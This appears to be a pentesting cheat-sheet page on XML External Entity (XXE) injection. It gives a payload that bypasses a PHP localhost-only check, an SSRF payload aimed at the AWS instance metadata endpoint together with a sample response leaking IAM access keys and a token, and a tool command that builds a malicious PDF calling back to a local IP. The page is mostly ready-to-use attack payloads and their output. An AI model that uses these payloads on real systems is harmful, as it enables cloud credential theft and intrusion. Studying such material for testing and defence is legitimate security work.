External Entity XML Injection

External Entity XML Injection¶

https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/

Bypassing Access Controls with XXE¶

Default Protections:

if (isset($_SERVER['HTTP_CLIENT_IP'])
    || isset($_SERVER['HTTP_X_FORWARDED_FOR'])
    || !in_array(@$_SERVER['REMOTE_ADDR'], array(
        '127.0.0.1',
        '::1',
    ))
) {
    header('HTTP/1.0 403 Forbidden');
    exit(
        'You are not allowed to access this file.'
    );
}

Php Bypass:

<?xml version="1.0"?>
<!DOCTYPE results [
    <!ENTITY harmless SYSTEM
    "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php"
    >
]>
<results>
    <result>&harmless;</result>
</results>

External Error XXE¶

SSRF¶

Simple HTTP Connection¶

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

HTTP/1.1 400 Bad Request
Content-Type: application/json
Connection: close
Content-Length: 546

"Invalid product ID: {
  "Code" : "Success",
  "LastUpdated" : "2019-12-12T18:17:44.456491Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "rNYgGiw5Wwv34YPVSzpN",
  "SecretAccessKey" : "m4RaetLQwyQwocJ60xjFJrwYnAJj03K8css1A9Fw",
  "Token" : "UCj4myxOKROLlb5wPp5Nahw2fHZsG5n1EkOGokbEtj7uCXa8bwoexc2wiX73Picn2AFwHa44f3Snpz02SuEmZtrTgma9Mr2J3Z48tXICOLyP3HgG5Sf7Q2ArYFZQNZoolTXwsX1jN2u2zTOtpoU0V34kcw0axRCXi9JusZ7z9QDrAWRroWeicvkRrKy7dkocW4MsQWxzINiiF39s4F5vRH7GQaKBahwprLJkd4NwH6PDY2IzlSLYpUxQzuJvS4tA",
  "Expiration" : "2025-12-10T18:17:44.456491Z"
}"

Generate Payloads¶

https://github.com/StefanMichielse/generate_xxe_payloads

SVG
PDF
Word Docs

Make a PDF¶

ruby oxml_xxe.rb --poc pdf -i 192.168.14.1:8000
|+| Inserting into ./samples/form.pdf. Currently this only tests for PUBLIC DTD
|+| Wrote to ./output/o_1636152138.pdf